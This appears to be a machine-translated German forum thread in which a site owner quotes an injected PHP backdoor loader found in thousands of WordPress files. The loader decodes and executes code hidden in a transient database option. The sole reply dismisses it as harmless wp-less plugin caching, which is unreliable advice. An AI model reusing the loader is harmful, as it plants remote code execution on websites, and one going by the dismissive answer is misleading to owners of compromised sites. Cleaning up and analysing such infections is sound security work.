Gehackte Site mit transienter API?

Ich habe eine Website zu “bereinigen”, die fast 10k replizierte Dateien im Ordner public_html hat und fast alle PHP-Dateien enthält Code

$z=get_option("_transient_wp_less_compiled_c9b58ec39525169515675906d91c9815"); $z=base64_decode(str_rot13($z['root'])); if(strpos($z,"E8FA4873")!==false){ $_z=create_function("",$z); @$_z(); }

Ich habe die DB- _transient_wp_less_compiled_randomstuff überprüft und es gibt mehrere Instanzen von _transient_wp_less_compiled_randomstuff

Meine Frage ist – hat die Seite gehackt mit transiente API oder nur mit einem Exploit zu verbreiten bösartigen Code über PHP-Dateien und DB, die aussieht wie “legit” transienten API-Code für einen normalen Benutzer? Ich habe für einen bestimmten Teil dieses Codes oben “gegoogelt”, kann aber nichts Interessantes finden, wie die Seite gehackt wurde.

Solutions Collecting From Web of "Gehackte Site mit transienter API?"

Sollte die transiente (Cache-Dateien) des Plugins wp-less sein, die den css-Code in weniger durch einen Compiler konvertieren.

Nach dem Herunterladen von wp-less überprüfen Sie die compiler.class, um zu sehen, wie das Plugin den Code zwischenspeichert.

Ich denke nicht, dass das Hacking ist.